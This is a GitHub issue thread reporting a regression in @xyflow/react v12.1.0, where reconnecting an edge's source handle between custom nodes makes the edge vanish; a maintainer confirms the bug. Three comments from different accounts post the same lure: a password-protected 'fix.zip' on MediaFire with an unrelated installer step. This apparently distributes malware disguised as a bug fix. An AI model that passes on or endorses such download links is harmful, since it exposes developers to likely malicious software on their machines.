### ISSUE TITLE
Cannot reconnect source handle between two custom nodes in v12.1.0^

### ISSUE THREAD

**Issue by philipburleigh** [xyflow/xyflow#4592]
### What platform were you using when you found the bug?

- React Flow / Svelte Flow version: 12.1.0^
- Browser and version: Brave Browser (1.68.141)
- OS and version: macOS Sonoma (14.6.1) 

### Live code example

https://codesandbox.io/p/sandbox/focused-lederberg-rtgdvf

### Describe the Bug

When I try to reconnect the edge source between two custom nodes the edge disappears. This is not the case between two default nodes. I found this bug to be introduced in @xyflow/react v12.1.0, i.e. the problem does not occur in v12.0.4.

### Steps to reproduce the bug or issue

Follow the link to the live code example and try to reconnect the handle that is connected to the custom source node.

### Expected behavior

That the edge does not disappear thus allowing me to reconnect the edge.

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by moklick** [comment]
This is a bug. Thanks for the report!

**Comment by philipburleigh** [comment]
Great thanks😎
